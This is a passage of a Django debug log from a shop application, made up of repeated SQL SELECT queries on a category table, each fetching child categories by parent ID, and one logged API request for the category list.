utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-31 21:25:27,463 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-31 21:25:27,466 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-31 21:25:27,468 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-31 21:25:27,470 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-31 21:25:27,472 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-31 21:25:27,475 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-31 21:25:27,478 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-31 21:25:27,480 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-31 21:25:27,482 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-31 21:25:27,485 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-31 21:25:27,487 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-31 21:25:27,490 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-31 21:25:27,492 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-31 21:25:27,494 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-31 21:25:27,497 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-31 21:25:27,499 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-31 21:25:27,502 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-31 21:25:27,504 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-31 21:25:27,507 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-31 21:25:27,509 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-31 21:25:27,511 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-31 21:25:27,513 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-31 21:25:27,516 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-31 21:25:27,518 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-31 21:25:27,520 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-31 21:25:27,523 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-31 21:25:27,525 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [31/Dec/2019 21:25:27] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-31 21:25:32,485 utils 2749 140297212245760 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-31 21:25:32,495 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 21:25:32,499 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-31 21:25:32,503 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 21:25:32,508 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-31 21:25:32,511 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-31 21:25:32,516 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-31 21:25:32,520 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-31 21:25:32,524 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-31 21:25:32,530 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-31 21:25:32,533 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-31 21:25:32,536 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-31 21:25:32,539 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-31 21:25:32,542 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-31 21:25:32,547 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-31 21:25:32,550 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-31 21:25:32,553 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-31 21:25:32,556 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-31 21:25:32,559 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-31 21:25:32,564 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-31 21:25:32,567 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-31 21:25:32,571 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-31 21:25:32,574 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-31 21:25:32,578 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-31 21:25:32,582 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-31 21:25:32,588 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-31 21:25:32,592 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-31 21:25:32,596 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-31 21:25:32,599 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-31 21:25:32,603 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-31 21:25:32,608 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-31 21:25:32,611 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-31 21:25:32,614 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-31 21:25:32,618 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-31 21:25:32,621 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-31 21:25:32,626 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-31 21:25:32,630 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-31 21:25:32,633 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-31 21:25:32,636 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-31 21:25:32,640 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", 